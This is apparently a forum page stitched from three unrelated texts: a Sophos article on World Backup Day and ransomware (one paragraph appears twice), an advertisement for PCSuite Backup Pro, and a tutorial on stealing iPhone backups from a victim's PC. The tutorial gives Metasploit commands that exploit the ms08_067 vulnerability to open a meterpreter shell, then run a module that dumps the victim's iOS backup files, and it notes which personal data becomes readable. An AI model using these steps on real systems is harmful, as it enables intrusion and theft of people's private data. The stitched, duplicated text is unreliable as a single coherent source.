Search the Community

31 March is World Backup Day, a chance for us all to avoid being April Fools by making sure we have secure backups of all our most important data. On last year's Backup Day, we provided a rundown of the most basic and important steps you can take to ensure your files can be retrieved in the event of a disaster. Most physical storage media, from hard drives and USB flash drives to CDs and DVDs, are vulnerable to damage from flood, fire, or sudden impact (sometimes even simply dropping them on the floor). That's not to mention having your laptop stolen, losing a USB drive, or indeed corruption or accidental deletion, so having a single copy of your important files is never a good idea. Of course, keeping a second copy right next to the computer holding your main copy is not going to help in the event of a fire or burglary. As a result, a range of online backup services has emerged in recent years, providing handy options for simple, low-cost backups that are shielded from many of the risks of copies stored in your home or office. There are some issues to consider here too, though, especially in terms of privacy. Depending on the service you use and the location of its servers, your data could be open to the prying eyes of government agencies and even hackers, so it's advisable to use strong encryption of your own if you need to upload data to a cloud service while keeping its content private. Make sure access is controlled with strong passwords and 2-factor authentication to keep unwanted people out of your account, and don't forget to pay the subscription fee, as your data may automatically be deleted if your account expires. The ransomware threat When we last covered World Backup Day, ransomware was a relatively new addition to the range of headaches facing us, with CryptoLocker hitting headlines around the world in late 2013. Since then ransomware has become a popular money-making tactic for cybercriminals, evolving multiple variants including CryptoWall and CryptoDefense, and going after iPhone users, gamers and companies' customer databases. Of course, ransomware wasn't invented with CryptoLocker – the AIDS Information Trojan, created in late 1989, was probably the first example of malware that scrambled your data and demanded money to decrypt it. But the inclusion of properly-implemented cryptography in CryptoLocker and its followers - rendering the files it targets for all practical purposes irretrievable without paying up - has turned it from an annoyance into a calamity for those affected. At least, that is, for those without proper backups. Any business should include regular and secure backups as one of its most basic processes, and everyday home users are steadily learning that this applies to them too. At least, that is, for those without proper backups. Any business should include regular and secure backups as one of its most basic processes, and everyday home users are steadily learning that this applies to them too. However, as we've seen, even in settings where you would expect secure computing practices, they're not always in place, with organisations from police departments to entire school districts finding their data locked up and held to ransom. Malicious encryption Having malicious software running on your computer, encrypting files at will, adds a further complication to the backup process. Many ransomware variants don't just scramble your C: drive. They look for any device that can be accessed as if it were a disk drive, including USB drives, network shares and even cloud-based storage, if it is mounted as a directly-accessible network drive. This could result in the double nightmare of having your carefully stowed backups also encrypted and locked up. There's also a risk with more basic scheduled backup systems that your local files could get encrypted, then backed up, overwriting existing "clean" backups so that even if you restore your backup, you are still stuck with scrambled files. Stepped backups So, there's a strong argument for some sort of stepped approach to backing up, using at least two separate backup devices and updating one or the other alternately on a regular basis, checking the integrity of the data stored on them each time. That way, you're reasonably sure you won't lose more than a few days or weeks' worth of data, even in the case of the most devious and long-lasting infection. The main point of World Backup Day is to make sure those of us who have yet to make any sort of effort to secure our data make a start and take those first basic precautions. If you haven't yet backed up any of your stuff, now would be a really good time to get moving. Sursa: https://nakedsecurity.sophos.com

Product Description PCSUITE BACKUP PRO 2 is the reliable, fully automatic, easy to use and fast backup solution. New features include the “one-to-one copy” for simple file mirroring to other storage media, backups of your Internet Explorer, Firefox and Chrome bookmarks as well as backups of your Windows contacts and of your Outlook and Thunderbird calendars and e-mails. The main interface presents four functions: create a new backup and view backup reports. The software allows you to back up data on the computer or user selected data. Incremental backup plans are also available, besides complete backups Once set up, the user must never again worry about the backup utility: When setting up backup policies are created that provide fully automatic creation of backup files across different time intervals. For even beginners the application provides reliable and sustainable protection for their files with few clicks. PCSUITE BACKUP PRO 2 also includes the innovative function called “Automatic Pausing.” This pauses the backup automatically, if you need the full power of your PC. PCSuite Backup Pro supports incremental storage and expands your archives only the files that have changed or created. The software keeps track of your Archive and restores files if necessary restore. You can back up individual files,directories and entire hard-drive partitions,the backups can be stored on a external drive (portable hard drive, USB drive, network drive). PCSuite Backup Pro 2 automatically creates backup copy of your data. The program stores the backup on your hard drive or an external mass storage, for example, a USB flash drive or a network drive. You can compress your backup data, set a password, and specify at what intervals backups are created. In addition, users can backup their data to the cloud, file-based backups are possible with both the 1:1 file copy and a private archive format. New in PCSuite Backup Pro 2 is the image backup feature.Also, with this app you can create a Linux-based rescue CD to restart the computer, when the system fails to boot up on its own. Features: Easy data backup Backs up, without interfering with the ongoing work Direct 1:1 copy or continuous backups Simple, wizard-driven interface Backups can be protected with password Different possible backup plans Fuse also (favorable) pcsuite ONLINE BACKUP service possible Supports external hard drives, network drives and USB sticks Grab a 50% Discount on PCSUITE Backup Pro 3 with Free Updates here. -> Download <-Deal Expire in: EXPIRED!

Introduction to iPhone Backups: iTunes is used to back up the iPhone data to a computer. iTunes backup makes a copy of everything on the device like contacts, SMS, photos, calendar, music, call logs, configuration files, database files, keychain, network settings, offline web application cache, safari bookmarks, cookies and application data, etc. It also backups the device details like serial number, UDID, SIM hardware number and the phone number. Normal Backups: When the iPhone is connected to a computer for the first time and synced with iTunes, iTunes automatically creates a folder with device UDID (Unique device ID – 40 hexadecimal characters long) as the name and copies the device contents to the newly created folder. If the automatic sync option is turned off in iTunes, the user has to manually initiate the backup process whenever the device is connected to the computer. iTunes also initiates an automated backup when the iPhone is updated or restored. iTunes backup location varies for different operating systems and the exact directory paths are listed in Table-1. If a passcode protected iPhone is connected to the computer for the first time, iTunes will require the user to enter the passcode and unlock the device before starting the sync process. Upon unlocking the iPhone with a valid passcode, iTunes recognizes the device as authorized and allows to backup and sync with the computer. From there on, iTunes will allow to backup or sync the iPhone without entering the passcode as long as it connects to the same computer. Encrypted Backups: iTunes also provide an option to create encrypted backups. To create encrypted backups, connect the device to the computer and select ‘Encrypt iPhone Backup’ option in iTunes. During the encrypted backup, iTunes prompt the user to enter a password. Later the password is used to encrypt all the files in the backup. Backup folder contains a list of files which are not in a readable format and it consists of uniquely named files with a 40 digit alphanumeric hex value without any file extension. Example file name is: f968421bd39a938ba456ef7aa096f8627662b74a. This 40 digit hex file name in the backup folder is the SHA1 hash value of the file path appended to the respective domain name with a ‘-‘ symbol. So the hash of DomainName-filepath will match to the correct file in the backup. In iOS 5, applications and inside data are classified into 12 domains (11 system domains and one application domain). The list of system domains can be viewed from /System/Library/Backup/Domains.plist file on the iPhone. Example: Address book images backup file is – cd6702cea29fe89cf280a76794405adb17f9a0ee and this value is computed from SHA-1 (HomeDomain-Library/AddressBook/AddressBookImages.sqlitedb). *Online hash calculator – Hash: online hash value calculator iTunes stores/reads the domain names and path names from Manifest.mbdb meta file. Manifest.mbdb is a binary file that contains information about all other files in the backup along with the file sizes and file system structure data. Backup file structure in older version of iTunes is managed by two files – Manifest.mbdx and Manifest.mbdb. In which, Manifest.mbdx file acts as an index file for the backup and indexes the elements that will be found in Manifest.mbdb. Since the introduction of iTunes 10, index file (mbdx) is eliminated and the backup is managed by a single mbdb file. Manifest.Mbdb file header and record format is shown in below Tables. Header: Mbdb file header is a fixed value of 6 bytes and the value acts as a magic number to identify the mbdb files. Record: Mbdb file contain many records and each record is of variable size. Every record contains various details about a file. More technical details about iPhone backups is documented in my paper – Forensic analysis of iPhone backups Metasploit – Apple iOS Backup File Extraction module Metasploit contains a post exploitation module using which we can steal the Apple iOS backup files from a victim’s computer. However the existing module was designed for iOS 4 backups and does not support the latest iOS 5 backups. I have updated the scripts to make it work with iOS 5 backups. Below details outline the usage of updated Metasploit – Apple iOS Backup File Extraction module. I have used Metasploit 4.4 from Backtrack 5R1. Apple iOS Backup File Extraction module is a post exploitation module. Metasploit says “The post-exploitation modules (post for short) are designed to run on systems that were compromised through another vector, whether its social engineering, a guessed password, or an unpatched vulnerability”. So in order to use the iOS backup module, first we have to compromise the system using some other vector. Usage Steps: 1. Download the apple_ios_backup.rb and place it in /opt/metasploit/msf3/modules/post/multi/gather/ directory. 2. Download the apple_backup_manifestdb.rb and place it in /opt/metasploit/msf3/lib/rex/parser/ directory. 3. Open the Metasploit using msfconsole. 4. Use meterpreter as a payload and exploit a vulnerability in the target system. In my case, the victim machine is running with the Windows XP OS (192.168.209.128) which is vulnerable to ms08_067_netapi vulnerability. Following the below steps exploits the vulnerability and opens a meterpreter shell. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.209.128 RHOST => 192.168.209.128 msf exploit(ms08_067_netapi) > exploit 5. Once the meterpreter session is established, iOS backup on the victim machine can be dumped using the following command- > run post/multi/gather/apple_ios_backup The above script searches for the iOS backup files in the default iTunes backup locations. If it does not find any backup in the target system, it will displays ‘ No users found with an iTunes backup directory’ message. If it finds the backup it dumps all the files and stores them as db files in the ~/.msf4/loot/ directory. Though Apple iOS backup extraction module dumps all the files from the victim’s backup, the level of data revealed to the attacker depends on the type of the iOS backup. If the victim machine contains an encrypted backup, the information that we get from stealing the backup files is almost nothing. Because all the files in the encrypted backup are encrypted with the user supplied iTunes password. If the victim machine contains a normal backup, we can read the sensitive data stored in all files except the Keychain database. In case of normal backups, the keychain is encrypted with a hardware key which is embedded in the iPhone. The post module can steal the iOS backups from Windows and Mac OS X machines. I have tested it for Windows. It should definitely work for OS X as well. Demonstration Video Sources: Stealing iPhone Backups using Metasploit | SecurityXploded Blog Metasploit post exploitation scripts to steal iOS 5 backups